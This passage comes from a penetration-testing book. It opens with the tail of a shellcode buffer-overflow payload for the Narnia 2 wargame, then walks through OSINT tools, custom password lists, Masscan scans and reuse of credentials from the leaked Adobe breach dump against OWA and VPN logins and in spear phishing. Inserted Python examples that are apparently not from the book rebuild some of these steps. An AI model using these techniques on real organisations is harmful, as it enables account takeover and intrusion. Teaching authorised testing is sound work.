"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x
+ "\x90" * 67 + "\x50\xd8\xff\xff"'`
• $ cat /etc/narnia_pass/narnia3
◦ [Answer to Narnia3 Here]







Narnia 2 — Exploit 


And there it works! We now have a privileged shell and can read the password for narnia3. 
Hopefully, this gives you an initial insight into how buffer overflows work and why they work. 
Remember that this was a quick 1000-foot view of binary exploitation. It is now up to you to spend 
some time trying some of the other examples. 


Summary 


What this chapter has tried to do is to help you build a standard platform for testing, make sure you
have a strong foundation of PowerShell, and give you an understanding of the basics of binary
exploitation.


Tools will always change, so it is important to keep your testing platforms up-to-date and patched. I 
have included all the tools that are used in this book and, hopefully, this information will be enough to 
get you started. If you feel that I am missing any critical tools, feel free to leave comments at: 


http://www.thehackerplaybook.com.


Take a full clean snapshot of your working VMs and let's start discovering and attacking networks. 


Before The Snap - Scanning The Network 


The game has started and you walk onto the SUCK, Inc. field. Before the first kickoff, and before we 
even attack our unsuspecting victim, we need to analyze our opponent. Studying the target for 
weaknesses and understanding the environment will provide huge payoffs. This chapter will take a 
look at scanning from a slightly different aspect than the normal penetration testing books and should 
be seen as an additive to your current scanning processes, not as a replacement. 

Whether you are a seasoned penetration tester or just starting in the game, scanning has probably been 
discussed over and over again. I am not going to compare in detail all the different network scanners, 
vulnerability scanners, SNMP scanners and so on, but I will try to give you my most efficient process 
for scanning. This section will be broken down into Open Source Intelligence, External Scanning, 
Internal Scanning, and Web Application Scanning. 


Passive Discovery - Open Source Intelligence (OSINT) 


Trained in Open Source Intelligence, you use your knowledge of where information exists on the 
Internet to find as much information about SUCK as we can. We want to become one with these Cyber 
Kittens, find their secrets, understand their verbiage, and find their employees. 


Before you ever even start performing any OSINT tests, it is best if you create fake social media 
accounts. Some examples of these might be (the more you have the better): 

• LinkedIn
• Twitter
• Google+
• Facebook
• Instagram
• MySpace
• Glassdoor


You don't want to use your own personal accounts as many of the sites show who visited your pages. 
This could be a quick way to get identified and potentially kill your whole mission. Now that we are 
ready with the OSINT setup, let's start gathering data. 


We will start with Passive Discovery, which will search for information about the target, network,
clients, and more without ever touching the targeted host. This is great because it uses resources on
the Internet without ever alerting the target of any suspicious activity. You can also run all these
lookups prior to an engagement to save you an immense amount of time. Let's start reviewing some
sources and tools for OSINT.


Recon-NG 


(https://bitbucket.org/LaNMaSteR53/recon-ng) (Kali Linux)


Recon-NG is a great tool for querying Open Source Intelligence (OSINT) for passive information 
about a company. This should be one of the first places you start before you pentest any organization. 
It can give you a lot of information about IP space, naming conventions, locations, users, email 
addresses, possible password leaks, and more. 


[recon-ng][default] > workspaces add SUCK
[recon-ng][Reddit] > add domains suck.testlab
[recon-ng][Reddit] > add companies
company (TEXT): SUCK Company
description (TEXT): Recon!
[recon-ng][Reddit] > use recon/domains-hosts/bing_domain_web
[recon-ng][Reddit][bing_domain_web] > run

Recon-ng





Prerequisites
There are some modules like Linked-In or Jigsaw that provide great value, but you do need to get API
keys for those. I will walk you through one API key example, which is free and easy to use.


To use the ipinfodb database to find the exact location of all the IPs you identify, you need to get an 
API key. Go to: http://ipinfodb.com/register.php and register for a key. We will add the key to our 
local store database during our next example. 


To run Recon-ng:
• cd /opt/recon-ng
• ./recon-ng
• workspaces add [Company Name - example SUCK Company]
• add domains [DOMAIN - example suck.testlab]
• add companies
• use recon/domains-hosts/bing_domain_web
◦ Look through Bing for domain names
• run
• use recon/domains-hosts/google_site_web
◦ Look through Google for domain names
• run
• use recon/domains-hosts/baidu_site
◦ Look through Baidu (Chinese search engine) for domain names
• run
• use recon/domains-hosts/brute_hosts
◦ Brute-force subdomains
• run
• use recon/domains-hosts/netcraft
◦ Look at Netcraft for domain names
• run
• use recon/hosts-hosts/resolve
◦ Resolve all the domain names to IPs
• run
• use recon/hosts-hosts/reverse_resolve
◦ Resolve all the IPs to hostnames/domain names
• run
• use discovery/info_disclosure/interesting_files
◦ Look for a few files on the identified domains
• run
• keys add ipinfodb_api [KEY]
◦ This is where you add your ipinfodb API key from earlier
• use recon/hosts-hosts/ipinfodb
◦ Find the location of the IPs that were discovered
• run
• use recon/domains-contacts/whois_pocs
◦ Find email addresses from the whois lookup
• run
• use recon/domains-contacts/pgp_search
◦ Look through the public PGP store for email addresses
• run
• use recon/contacts-credentials/hibp_paste
◦ This will check all of the email accounts you have gathered against the "Have I Been Pwned"
website. This will let you know if there are potentially leaked passwords that you might be able to use.
• run
• use reporting/html
◦ Create a report
• set CREATOR HP2
• set CUSTOMER HP2
• run
• exit
• firefox /root/.recon-ng/workspaces/SUCK Company/results.html


This will create a report of all the findings in one single web page. Let's take a look at what type of
valuable data has been gathered:


[Screenshot: /root/.recon-ng/workspaces/SUCK Company/results.html, the Recon-ng Reconnaissance Report with its Summary, Hosts and Contacts sections]

Recon-ng Report


From the results above, we can see that we have been able to quickly identify a ton of different
hostnames, IPs, locations, email addresses, and more. This is a great start for getting some
reconnaissance on our victim. Let's keep gathering data!


Discover Scripts 
(https://github.com/leebaird/discover) (Kali Linux) 


Discover scripts by Lee Baird is still one of my favorite passive discovery tools because of the ease 
of use and the amount of data gathered. Using a passive recon scan, Discover will use tools such as: 
dnsrecon, goofile, goog-mail, goohost, theharvester, metasploit, urlcrazy, whois, dnssy, ewhois, 
myipneighbors, and urlvoid. Discover is updated often and is a great tool for performing OSINT. 


[Screenshot: Discover menu (By Lee Baird). RECON: 1. Domain, 2. Person, 3. Parse salesforce. SCANNING: Generate target list (CIDR, List, IP/Range/URL). Also: 11. Crack WiFi, 12. Parse XML, 13. Start a Metasploit listener, 14. Update, 15. Exit. Prompt: Choice:]

Discover Script


• cd /opt/discover
• ./discover.sh
◦ 1. Domain
◦ 1. Passive
◦ [Company Name]
◦ [Domain Name]
◦ firefox /root/data/[Domain]/index.htm


The results include information about email addresses, names of employees, and hosts. 


[Screenshot: /root/data/[Domain]/pages/passive-recon.htm, the Discover "Reports: Passive Recon" page. Summary: Emails 18, Names 87, Hosts 9, Squatting 48, Subdomains 32, Text 1, followed by the Emails (18) and Names (87) lists]

Discover Report


Some of the more interesting findings are those such as squatting and bitflipping. Discover shows us 
which squatting domains have been purchased and which are currently free. In an engagement, a 
doppelganger domain could prove extremely valuable for phishing, trust, or compromising victims. 
[Screenshot: the same Discover report, Squatting (48) section, listing Character Omission, Character Repeat, Character Swap, Double Character Replacement and Missing Dot variants of suck.testlab with their IPs and countries, followed by the Subdomains (32) section (about., apidoc., blog. and so on)]

Discover Domain Information
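A defender-side version of the squatting check, as an added example (not Discover's or urlcrazy's code): it generates look-alikes of a domain under the categories the report above lists, plus the bit flips the text mentions, and runs them through a resolver to see which are already registered. The category rules are this example's own approximations, and the resolver defaults to socket.gethostbyname but can be swapped out for offline use.

```python
import socket

# Characters allowed in a hostname label; candidates using anything else are dropped.
HOST_CHARS = frozenset("abcdefghijklmnopqrstuvwxyz0123456789-")


def _split(domain):
    """'suck.testlab' -> ('suck', 'testlab'); only the first label is mutated."""
    label, _, rest = domain.lower().partition(".")
    return label, rest


def squat_candidates(domain):
    """Look-alike names grouped by the categories the Discover report uses, plus
    bit flips. The rules are this example's own approximations, not urlcrazy's."""
    label, rest = _split(domain)
    cats = {"Character Omission": set(), "Character Repeat": set(),
            "Character Swap": set(), "Missing Dot": set(), "Bit Flip": set()}
    for i, ch in enumerate(label):
        cats["Character Omission"].add(label[:i] + label[i + 1:])
        cats["Character Repeat"].add(label[:i + 1] + ch + label[i + 1:])
        if i + 1 < len(label):
            cats["Character Swap"].add(label[:i] + label[i + 1] + ch + label[i + 2:])
        # bitsquatting: one flipped bit in memory or on the wire turns a character
        # into another one, so the mutated name is worth registering defensively
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit))
            if flipped in HOST_CHARS:
                cats["Bit Flip"].add(label[:i] + flipped + label[i + 1:])
    # "Missing Dot" as the report shows it: wwwsuck.testlab and sucktestlab.testlab
    cats["Missing Dot"].update({"www" + label, label + rest.replace(".", "")})
    # drop empty or unchanged labels and re-attach the rest of the domain
    return {cat: sorted(name + "." + rest for name in names if name and name != label)
            for cat, names in cats.items()}


def registered(domain, resolve=socket.gethostbyname):
    """{candidate: (category, address)} for look-alikes that currently resolve.
    The resolver is injectable so the check can be exercised without network access."""
    live = {}
    for cat, names in squat_candidates(domain).items():
        for name in names:
            try:
                live[name] = (cat, resolve(name))
            except OSError:  # NXDOMAIN, timeouts and the like
                continue
    return live


if __name__ == "__main__":
    for cat, names in squat_candidates("suck.testlab").items():
        print("%-20s %d candidates, e.g. %s" % (cat, len(names), ", ".join(names[:3])))
```

Run against your own domain on a schedule and diff the output of registered(); a candidate that starts resolving is a new doppelganger to investigate.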


Spiderfoot 
(http://www.spiderfoot.net/)(Kali Linux) 


One last tool I like to use for OSINT is SpiderFoot. SpiderFoot, written by Steve Micallef, is a quick 
little tool that performs a ton of different OSINT recon. Every tool queries the data slightly differently 
and presents it in different fashions. Thus, it helps to have multiple tools to gather OSINT data to 
compile a good view of the victim company. 


Running SpiderFoot: 
• cd /opt/spiderfoot/spiderfoot*
• python ./sf.py
• open up a browser and go to http://127.0.0.1:5001/


[Screenshot: SpiderFoot v2.3 "New Scan" page in Iceweasel. Scan Name: SUCK; Seed Target; module selection tabs "By Required Data" and "By Module", with entries such as Affiliate - IP Address, BGP AS Membership, Blacklisted IP Address, Co-Hosted Site, Cookies, DNS TXT Record, Defaced, Device Type]

SpiderFoot


What type of information is collected? Everything from blacklists to IPv6 addresses to Co-Hosted 
Sites to E-mail addresses. As you know, every tool is maintained differently and there are many times 
where one tool will find different information compared to another tool. What is good about 
SpiderFoot is that it is quick, very easy, and comes back with a ton (I mean a ton) of great OSINT 
information. I ran a quick scan for a site and within seconds, I found loads of information on a domain 
or IP. 
SpiderFoot Report


With these three sources, we should have a good idea of our victim's open source intelligence. This 
data will become very valuable later, so make sure you review all the data thoroughly. 


Creating Password Lists: 


From the OSINT searches, we have learned a great deal about SUCK and their organization. The next 
step is to find more targeted information about the company, the people, the location, and their 
customers by developing more customized password lists. We have all used large password lists in 
the past and specifically in THP1, but we are looking to crack that 70%+ rate. To achieve this, we 
need to create custom and smart word lists based on our victim companies and related industries. 


In the last book, we used the crackstation list, which we will definitely use again, but after having a 
great password base, you need to also build a list of custom passwords. 


Wordhound 
(https://bitbucket.org/mattinfosec/wordhound.git) (Kali Linux) 


Wordhound is a tool that creates word lists and dictionaries based on Twitter searches, PDF 
documents, and even Reddit sub-reddits. So to target our victim company, we can grab all the results 
from their tweets and even words that might be associated with the company. {1} 


Wordhound didn't run right off the bat in Kali Linux at the time of writing this book, so I had to do a 
few modifications: 

• git clone https://bitbucket.org/mattinfosec/wordhound.git /opt/wordhound/
• apt-get install python-setuptools
• cd /opt/wordhound && python setup.py install && ./setup.sh


I had some issues with tweepy, so I had to manually git clone it and re-download it:
• manually install tweepy
◦ pip install -U pip
◦ git clone https://github.com/tweepy/tweepy.git /opt/tweepy/
◦ cd /opt/tweepy
◦ python ./setup.py install
◦ /usr/local/bin/pip install requests[security]
◦ service ntp restart


Once you get everything working, we need to edit the configuration file: 
• cd /opt/wordhound && gedit wordhound.conf.dist
• Input the relevant information such as your Twitter API key if you want to use Twitter.
If you don't currently have a Twitter API key, you can get one from here:
https://apps.twitter.com/app/new. Once you get your key, write down your:
◦ Consumer Key (API Key)
◦ Consumer Secret (API Secret)
◦ Access Token
◦ Access Token Secret
• cp wordhound.conf.dist wordhound.conf


After adding these to your wordhound.conf.dist file, save or move that copy to wordhound.conf. That 
is really the only initial configuration you will need to get this all working. For our first run, we are 
going to first generate a dictionary from a website. This will scrape the webpage and make a unique 
list of words to use for our password list. 


To start Wordhound:
• cd /opt/wordhound
• python Main.py
• 1. Generate Dictionary
• 3. Create new industry
◦ Enter industry: SUCK
• 1. Generate Dictionary
• 1. SUCK
• 1. Create new client
◦ SUCK
• 1. Generate Dictionary from website.
◦ http://www.securepla.net
• How many levels: 3
• gedit "data/industries/Hacker Playbook/Hacker Playbook/WebsiteDictionary.txt"


[Screenshot: data/industries/Hacker Playbook/Hacker Playbook/WebsiteDictionary.txt, one word per line, such as bypassuac, pentestgeek, hacker, mimikatz trunk, vulnerabilities, crackstation, hackers]

Wordhound - Web Results


Now, with a good list from websites, we need other sources of data to append to that list. One great 
source of valuable data is Twitter. Twitter usually includes very relevant data based on specific 
searching. We can use Wordhound to go through Twitter on a specific word or words and grab all the 
unique words from it. Let's run this by choosing: 


• 4. Generate Dictionary from twitter search term.
◦ Search Term: hacking
• gedit data/industries/Hacker\ Playbook/Hacker\ Playbook/TwitterSearchTermDictionary.txt
[Screenshot: Wordhound menu in a root@kali:/opt/wordhound terminal, prompting for the Twitter search term and the number of tweets to fetch (Default = 700)]

Wordhound - Twitter

[Screenshot: TwitterSearchTermDictionary.txt, one word per line, such as playbook, hacker, penetrationtesting, suspenseful, tweet, tutorials, infosec, along with plenty of noise words and hashtags]

Wordhound - Twitter Results


Another favorite source of data is from Reddit. This is where you get creative. You need to find the 
right sub-reddits that represent your company or industry. You can try a multitude of different sub- 
reddits to find out which best suit your engagement. 


Since our target in this case is a security company, we can parse one of my favorite sub-reddits: 
/r/netsec. Let’s see what types of unique words we can identify: 


• 5. Generate Dictionary from Reddit
◦ netsec

[Screenshot: RedditDictionary.txt in a root@kali:/opt/wordhound terminal, with words such as meterpreter, inmemory, annonymous, writeable, opsec, and adjacent word pairs stored both spaced and joined: block cipher / blockcipher, dont know / dontknow, memory dump / memorydump, north korea / northkorea]

Wordhound - Reddit


We can see from /r/netsec, that we have a lot of new words to add to our potential password list that 
we might not have caught with the other lists. Target industries from different subreddits—maybe the 
city they belong to, the company, the industry, etc. 


Brutescrape 
( ) (Kali Linux) 


I had problems getting Wordhound to parse webpages properly, so until it is fixed, I created a quick
python script to scrape pages and provide unique results. BruteScrape is a tool that reads the source
of any webpage, parses out all the HTML tags, cleans up the results, and uniques them. This is a great
quick tool to build password lists from a bulk import of websites.


• cd /opt/brutescrape/
• gedit sites.scrape and put in the websites you want to scrape
• results are stored to passwordList.txt

[Screenshot: BruteScrape running]

BruteScrape


The customized passwords gained from BruteScrape and Wordhound, combined with the large 
common password lists, give us a great start to crack and brute-force accounts. 
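As an added example (not the book's code and not BruteScrape's or Wordhound's), here is the core of what both tools do: strip the HTML, tokenize, drop filler, keep every word once in page order and, as Wordhound's Reddit output above shows, also emit each adjacent word pair spaced and joined. The HTML page is a constructed sample. On the defensive side, the same list fed to your own password audit shows whether staff passwords are derived from the company's public text.

```python
import html
import re

# Constructed sample page standing in for a scraped company website (not real content).
SAMPLE_HTML = """<html><head><title>SUCK Inc. - Cyber Kittens</title>
<script>var tracking = "ignore-me";</script>
<style>.x { color: red }</style></head>
<body><h1>Welcome to SUCK Inc.</h1>
<p>Our <b>Cyber Kittens</b> team builds the <a href="/kitten">Kitten&nbsp;Platform</a>.
Contact support@suck.testlab or call 555-0100. Cyber kittens rule!</p>
</body></html>"""

# Script and style blocks are dropped whole (nobody types their contents as a password);
# every other tag is replaced by a space so that words on either side do not fuse.
TAG_RE = re.compile(r"<(script|style)\b.*?</\1\s*>|<[^>]+>", re.S | re.I)
WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9']*")
# Tiny filler list; a real run would use a fuller stop-word list.
STOPWORDS = {"the", "a", "an", "and", "or", "of", "to", "our", "in", "is"}


def strip_html(page):
    """Remove tags and decode entities such as &nbsp; and &amp;."""
    return html.unescape(TAG_RE.sub(" ", page))


def tokenize(text, min_len=3):
    """Lower-case word tokens in page order, minus short words and filler."""
    words = []
    for raw in WORD_RE.findall(text):
        word = raw.lower().strip("'")
        if len(word) >= min_len and word not in STOPWORDS:
            words.append(word)
    return words


def unique_words(page, min_len=3):
    """Ordered, de-duplicated words from one page (what BruteScrape's output holds)."""
    return list(dict.fromkeys(tokenize(strip_html(page), min_len)))


def build_wordlist(page, min_len=3):
    """unique_words() plus each adjacent word pair, spaced and joined, so that
    'Cyber Kittens' yields both 'cyber kittens' and 'cyberkittens'."""
    words = tokenize(strip_html(page), min_len)
    candidates = list(words)
    for left, right in zip(words, words[1:]):
        candidates.append(left + " " + right)
        candidates.append(left + right)
    return list(dict.fromkeys(candidates))


def write_wordlist(page, path="passwordList.txt"):
    """Persist one candidate per line, the layout a password auditor expects."""
    wordlist = build_wordlist(page)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(wordlist) + "\n")
    return len(wordlist)


if __name__ == "__main__":
    for candidate in build_wordlist(SAMPLE_HTML):
        print(candidate)
```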


Using Compromised Lists To Find Email Addresses And 
Credentials 


The great thing about being a penetration tester is that you have to get creative and use all sorts of 
resources, just as if someone was malicious. One tactic that I have found to be very fruitful in the past 
is using known credential dumps for password reuse. Let me explain a little more in detail. 


There was a large breach of Adobe's systems. The compromised information consisted of email 
addresses, encrypted passwords, and their password hints. {2} The large dump, which was almost 10 
Gigabytes, was released privately in small circles and is now publicly available (try searching for 
Adobe and users.tar.gz). From an attacker's perspective this is a gold mine of information. What I 
generally do is parse through this file and identify the domains against which I am doing a test. 


Of course, it is important to see if this type of testing is in the scope of your engagement and that you 
aren't breaking any laws by obtaining a copy of any password/compromised lists. If it is a full black 
box test, this should definitely be a part of your attacking approach. 


For example, in the image below, I will search (using the Linux grep command: grep "@yahoo.com"
cred > hashlist.txt) through the Adobe password list for a sample domain of yahoo.com and write that
to a file named hashlist.txt (remember you should search for the domain for which you are testing).
We can see that there are many users (which I redacted) with an email address containing yahoo that
have an encrypted password and password hint.


root@kali:/mnt/hgfs/users# grep "yahoo.com" cred

[Screenshot: redacted rows from the dump, each in the form id-|--|-email-|-encrypted password-|-hint|--, with hints such as boyfriend, newest, mobile, birthday, my friend, highschool]

List of Accounts/Passwords from Adobe Breach 2013


Based on the hints, you could do some research and find out who a specific user's boyfriend is or the 
name of their cat, but I usually go for the quick and dirty attempt. I was able to find two groups of 
researchers who, based on patterns and hints, were able to reverse some of the encrypted passwords. 
Remember that from the Adobe list, since the passwords aren't hashes but encrypted passwords, 
trying to reverse the passwords is much more difficult without the key. The two reversed lists I was 
able to identify are: 

• http://stricture-group.com/files/adobe-top100.txt
• http://web.mit.edu/zyan/Public/adobe_sanitized_passwords_with_bad_hints.txt (no longer available)


I combined both these lists, cleaned them, and hosted them on my Github:
• https://github.com/cheetz/adobe_password_checker/blob/master/foundpw.csv


Taking this list, I put together a short python script that parses through a list of email/encrypted 
passwords and compares that against the foundpw.csv file. Let’s pull this code onto your Kali Linux 
host: 

• git clone https://github.com/cheetz/adobe_password_checker /opt/adobe_password_checker
• cd /opt/adobe_password_checker/


The password_check.py python script will find any password matches between the hashlist.txt file
you created and the foundpw.csv file, which contains known passwords. When a match is found, the
script will return a list of email addresses and the reversed passwords. Of course, the two research
groups do not have a large number of the passwords reversed, but it should contain the low-hanging
fruit. Let's see this in action:

• Make sure to copy your hashlist.txt file to /opt/adobe_password_checker/
• python password_check.py


root@kali:/opt/adobe_password_checker# python password_check.py

[Screenshot: Matches[+] lines of the form email : encrypted password,reversed password; several redacted yahoo.com addresses share the same encrypted password and the reversed password beginning "if your a hacker my password is january"]

Custom Script to Look for Email/Passwords
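The same join, written out as an added example (not the book's password_check.py): parse the dump's record layout, restrict to one mail domain as the grep step did, and look each encrypted password up in a reversed-password table. The records and the table are constructed samples, and the table's "ciphertext,plaintext" layout is an assumption to check against the real foundpw.csv. For a blue team this is the check that tells you which of your own addresses sit in the dump with a password that is already public, so those accounts can be reset first.

```python
import csv
import io

# Constructed sample records in the dump's layout (id-|-user-|-email-|-ciphertext-|-hint|--).
# IDs, addresses and ciphertext strings are made up for this example.
SAMPLE_HASHLIST = """38705-|--|-alice@suck.testlab-|-AAAAexampleCipher1A==-|-boyfriend|--
38709-|--|-bob@suck.testlab-|-BBBBexampleCipher2B==-|-newest|--
38713-|--|-carol@suck.testlab-|-AAAAexampleCipher1A==-|-same as always|--
this line is corrupt and must be skipped
38747-|--|-dave@suck.testlab-|-CCCCexampleCipher3C==-|-birthday|--
38750-|--|-eve@other.example-|-AAAAexampleCipher1A==-|-|--
"""

# Constructed stand-in for foundpw.csv; its "ciphertext,plaintext" layout is assumed.
SAMPLE_FOUNDPW = """AAAAexampleCipher1A==,january
CCCCexampleCipher3C==,birthday1
"""

FIELD_SEP = "-|-"
RECORD_END = "|--"


def parse_record(line):
    """Split one dump line into its fields; return None for anything malformed."""
    line = line.rstrip("\r\n")
    if not line.endswith(RECORD_END):
        return None
    fields = line[: -len(RECORD_END)].split(FIELD_SEP)
    if len(fields) != 5:
        return None
    uid, _user, email, cipher, hint = fields
    if "@" not in email or not cipher:
        return None
    return {"id": uid, "email": email.lower(), "cipher": cipher, "hint": hint}


def load_foundpw(text):
    """ciphertext -> plaintext map. A plaintext may itself contain commas,
    so everything after the first column is rejoined."""
    table = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) >= 2:
            table[row[0].strip()] = ",".join(row[1:])
    return table


def _in_scope(rec, domain):
    return not domain or rec["email"].endswith("@" + domain.lower())


def find_matches(hashlist_text, foundpw_text, domain=None):
    """(email, ciphertext, plaintext, hint) for records whose ciphertext is in the
    reversed table, optionally limited to one mail domain. The lookup works because
    the dump's encryption was deterministic: equal passwords give equal ciphertext,
    which is why alice and carol in the sample collide."""
    table = load_foundpw(foundpw_text)
    matches = []
    for line in hashlist_text.splitlines():
        rec = parse_record(line)
        if rec is None or not _in_scope(rec, domain):
            continue
        if rec["cipher"] in table:
            matches.append((rec["email"], rec["cipher"], table[rec["cipher"]], rec["hint"]))
    return matches


def reuse_groups(hashlist_text, domain=None):
    """Addresses grouped by shared ciphertext, i.e. by shared password, even when no
    plaintext is known: a cheap signal of a default or handed-around password."""
    groups = {}
    for line in hashlist_text.splitlines():
        rec = parse_record(line)
        if rec is None or not _in_scope(rec, domain):
            continue
        groups.setdefault(rec["cipher"], []).append(rec["email"])
    return {c: emails for c, emails in groups.items() if len(emails) > 1}


if __name__ == "__main__":
    for email, cipher, plain, hint in find_matches(SAMPLE_HASHLIST, SAMPLE_FOUNDPW, "suck.testlab"):
        print("Matches[+]: %s : %s,%s (hint: %s)" % (email, cipher, plain, hint))
```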





I will usually take the results from this output and try the usernames/passwords against the company's 
Outlook Web Access (OWA) logins or against VPN logins. You may need to play around with some 
of the variables on the passwords (i.e. if they have 2012, you might want to try 2015) and also make 
sure you don't lock out accounts. 


I then take the email addresses gathered from these findings and use them in spear phishing 
campaigns. Remember, if they are on the Adobe list, there is a good chance that these users are in the 
IT group. Owning one of these accounts could be extremely beneficial. 


This is why penetration testing is so much fun. You really can't just run tools—you have to use your 
own creativity to give your customer the best and most real-world types of attacks they might receive. 
Don't forget to keep checking Pastebin type sites, password dump sites, and Bittorrent files for 
password leaks. 


Gitrob - Github Analysis 
(https://github.com/michenriksen/gitrob) (Kali Linux) 


In today’s world, the “information gathering game” is changing ever so rapidly. If your client is a 
large client, chances are many of the developers are also on Github. This is where Gitrob comes into 
play. Michael Henriksen developed a tool to search through Github for a customer and any potentially 
sensitive files. These files can include secret HTTP endpoints, session IDs, user information, 
passwords and API keys. 

In terms of OSINT, these sources are great for gathering emails, learning about what the potential 
company might be developing, default passwords, possible API keys, and more. 


Configuring Gitrob:
• cd /opt/gitrob/bin
• ./gitrob --configure
• user: gitrob
• password: from what you configured during the installation
• To access Github via this API, we need to first get an Access Token:
◦ Create/Login to Github Account
◦ Go to Settings -> Applications
◦ Generate Token
• Enter the Token into Gitrob

[Screenshot: GitHub Settings -> Applications page, where the personal access token is generated]

Gitrob search


To start a Gitrob search: 
e gitrob -o <orgname> 


In our example below, we will test this against the org name of reddit. 


:/opt/gitrob/bin# gitrob -o reddit 


By @michenriksen


Starting Gitrob version 0.0.3 at 2015-01-15 04:09 EST 
Loading configuration... done 

Preparing SQL database... done 

Loading file patterns... done 

Collecting organization repositories... done 
Collecting organization members... done 
Collecting member repositories... 

Collected 6 repositories from atiaxi 
Collected 14 repositories from ajacksified 
Collected 5 repositories from alienth 
Collected 3 repositories from bsimpson63 
Collected 16 repositories from btholt 
Collected 5 repositories from Deimos 
Collected 9 repositories from JordanMilne 
Collected 7 repositories from mtitolo 
Collected 1 repository from rram 

Collected 15 repositories from spladug 
Collected 6 repositories from umbrae 
Collected 27 repositories from xiongchiamiov 
Collected 6 repositories from zeantsoi 


Processing repositories... 
sed 75 files from reddit/reddit-i18n with no findings
128 files from reddit/iReddit with no findings 
28 files from reddit/snudown with no findings 
19 files from reddit/monitors with no findings 
20 files from reddit/error-pages with no findings 
20 files from reddit/push with no findings 


Gitrob - Running 








Once the scan is complete, open a browser and go to http://127.0.0.1:9393/. You will see three tabs. 
The first tab is the findings. These might contain information such as references to secret HTTP 
endpoints, session IDs, user information, passwords and API keys. 


[Screenshot: Gitrob web interface, Findings tab]

Gitrob - Findings


The second tab shows all the users it was able to grab, along with associated repositories. 


[Screenshot: Gitrob web interface, Organizations > reddit, Users tab listing members and their repositories]

Gitrob - Users


OSINT Data Collection 


Collecting and studying a company passively is one of the most important factors in a successful 
penetration test. This allows us to gain a wealth of data without ever triggering a single IDS alert. 


We should now have enough information about the company, the industry, and possible user 
passwords. The best part is that we found all this data passively. Let’s move on to scanning and 
active discovery. 


External/Internal Active Discovery 


Active discovery is the process of trying to identify systems, services, and potential vulnerabilities. 
We are going to target the network ranges specified in scope and scan them. Whether you are scanning 
from the internal or the external segments of the network, it is important to have the right tools to 
perform active discovery. 


I want to emphasize that this book is not going to discuss in detail how to run a scanner, as you should 
already be familiar with that. If you aren’t, then I recommend that you download the community 
edition of Nexpose or get a trial version of Nessus. Try running them in a home network or even in a 
lab network to get an idea of the types of findings, how to use authenticated scans, and the type of 
traffic generated on a network. These scanners will trigger IDS/IPS alerts on a network very 
frequently as they are extremely loud. Now that we are ready, let's get into some of the finer details 
here. 


In this section, I describe the process that I like to use when scanning a network. I will use multiple 
tools, processes, and techniques to try and provide efficient and effective scanning. My scanning 
processes will look something like this: 


• Scanning with Masscan
• Scanning with Sparta
• Scanning with HTTP Screenshot
• Scanning with Eyewitness/WMAP
• Scanning using Nexpose/Nessus/OpenVAS
• Scanning with Burp Proxy Pro
• Scanning with ZAP Proxy
• Parsing Output


Masscan 
(https://github.com/robertdavidgraham/masscan) (Kali Linux) 


Once you start active scanning, there are many tools to use. Historically, we have all used nmap to 
map out IPs/Ports, but the game has been changing. Large ranges are a pain to scan, but this is where 
Masscan comes into play. Similar to nmap (it even has similar flags), Masscan uses its own custom 
TCP/IP stack for speed and efficiency. Let's see how we would kick off a Masscan scan. 
Running Masscan:
• cd /opt/masscan/bin/
• ./masscan -p80,8000-8100 10.0.0.0/8
• ./masscan -p0-65535 --rate 150000 -oL output.txt
  o -p defines the ports to be scanned
  o --rate defines packets-per-second
    ▪ Be careful with this setting. Make sure that the VPS, or the system/network from which you run Masscan, can support the amount of traffic generated.
  o -oL defines the list output file to write to


For example, I ran some test scans from a VPS server: 


hp2:/opt/masscan/bin$ ./masscan -p0-65535 23.239.151.0/24 --rate 150000 -oL output.txt
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-02-02 05:46:10 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [65536 ports/host]
hp2:/opt/masscan/bin$ date
Mon Feb 2 05:48:23 UTC 2015
From the test scan above, a full port scan of the /24 takes about two minutes with the configuration and system on which we are testing. Luckily, my VPS sits on a very large network and can support a high rate of packets per second.


Running nmap with similar settings:
hp2:/opt/masscan/bin$ nmap -v -PN -n -sT -T5 23.239.151.0/24 -p0-65535 -oN output_nmap.txt
Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-02-02 05:53 UTC
Initiating Connect Scan at 05:53
Scanning 64 hosts [65536 ports/host]
Discovered open port 80/tcp on 23.239.151.23
Stats: 0:00:22 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 1.18% done; ETC: 06:26 (0:32:11 remaining)


From the in progress results above, we can see the scan will take well over 30 minutes (as it is 
scanning 64 hosts at a time). 


Masscan improves scanning significantly and allows a tester to scan and have results in minimal time. One feature that really helps you configure your Masscan scans is the --echo switch. The example below writes the scan's configuration to a file; reading that file shows all the settings the scan will use. Once the settings are correct, the scan can be kicked off with the -c flag.


• hp2:/opt/masscan/bin# ./masscan -p0-65535 23.239.151.0/24 --rate 150000 -oL output.txt --echo > scan.conf
• hp2:/opt/masscan/bin# cat scan.conf
rate = 150000.00
randomize-hosts = true
seed = 14393045175689752532
shard = 1/1
# ADAPTER SETTINGS
adapter-ip = 0.0.0.0
# OUTPUT/REPORTING SETTINGS
output-format = list
show = open,,
output-filename = output.txt
rotate = 0
# TARGET SELECTION (IP, PORTS, EXCLUDES)
ports = 0-65535
range = 23.239.151.0/24
• hp2:/opt/masscan/bin# ./masscan -c scan.conf


We can save this template and use it for all future scans or have a list of templates for specific types 
of scans. 
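Masscan's -oL list output is what the rest of the scanning process consumes, so here is an added example (my own code, not from the book or the masscan project) that parses that format into a per-host port summary and builds the list of web URLs a screenshot tool would visit. It assumes masscan's list record layout of state, protocol, port, IP and timestamp, and it runs over a constructed sample rather than a real scan.

```python
"""Parse masscan list output (-oL) into a per-host port summary.

Added example, not part of the book. Assumes masscan's list format:
  <state> <proto> <port> <ip> <timestamp> [banner-type banner-text]
Lines beginning with '#' are comments and are ignored.
"""
import ipaddress
from collections import defaultdict

# Web ports the book's masshttp.sh configuration scans (taken from the text).
WEB_PORTS = {80, 443, 8000, 8001, 8080, 8443, 8008, 9200, 50070}
TLS_PORTS = {443, 8443}

# Constructed sample of masscan -oL output (not real scan data).
SAMPLE_OUTPUT = """\
#masscan
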